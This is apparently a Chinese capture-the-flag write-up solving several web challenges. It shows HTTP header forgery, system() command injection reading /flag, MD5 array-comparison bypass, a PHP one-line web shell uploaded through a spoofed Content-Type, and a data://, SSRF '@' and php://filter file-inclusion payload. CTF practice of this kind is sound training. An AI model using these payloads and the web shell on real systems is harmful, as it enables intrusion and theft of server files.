HTTP 是什么呀

常规的GET,POST传参,改cookie,referer,UA,IP,注意这里如果是GET传参要传入%00,就要先url编码一次,即传入%2500,因为浏览器会自动进行一次url解码

GET /?basectf=we1c%2500me 
POST Base=fl@g
Cookie: c00k13=i can't eat it
User-Agent: Base
Referer: Base
X-Forwarded-For:127.0.0.1

image-20250123100202715

base64解码即可

喵喵喵´•ﻌ•`

直接GET传参

DT=system('ls /');
DT=system('cat /flag');

md5绕过欸

直接数组绕过即可,注意第二层为强比较,也可用数组绕过

GET:name[]=1&name2[]=2
Post:password[]=3&password2[]=4

image-20250123101418800

A Dark Room

源码

image-20250123101654334

upload

写个一句话木马存为1.php上传,bp抓包修改文件类型为Content-Type: image/jpeg绕过即可

<?php eval($_POST['123']);?>

蚁剑连接或者直接向/uploads/1.php传参123=system(‘cat /flag’);

image-20250123102908299

Aura 酱的礼物

<?php
highlight_file(__FILE__);
// Aura 酱,欢迎回家~
// 这里有一份礼物,请你签收一下哟~
$pen = $_POST['pen'];
if (file_get_contents($pen) !== 'Aura')
{
    die('这是 Aura 的礼物,你不是 Aura!');
}

// 礼物收到啦,接下来要去博客里面写下感想哦~
$challenge = $_POST['challenge'];
if (strpos($challenge, 'http://jasmineaura.github.io') !== 0)
{
    die('这不是 Aura 的博客!');
}

$blog_content = file_get_contents($challenge);
if (strpos($blog_content, '已经收到Kengwang的礼物啦') === false)
{
    die('请去博客里面写下感想哦~');
}

// 嘿嘿,接下来要拆开礼物啦,悄悄告诉你,礼物在 flag.php 里面哦~
$gift = $_POST['gift'];
include($gift);

第一层直接用data伪协议读取文件为Aura,第二层参考从一文中了解SSRF的各种绕过姿势及攻击思路,通过@来隔断,将@前方当作用户名,第三层为文件包含,通过filter过滤器获得注释部分中的flag内容

pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@127.0.0.1&gift=php://filter/read=convert.base64-encode/resource=flag.php

image-20250123104002843

一起吃豆豆

直接在源码index.php中找到游戏通关后逻辑,base64解码即可

image-20250123110856572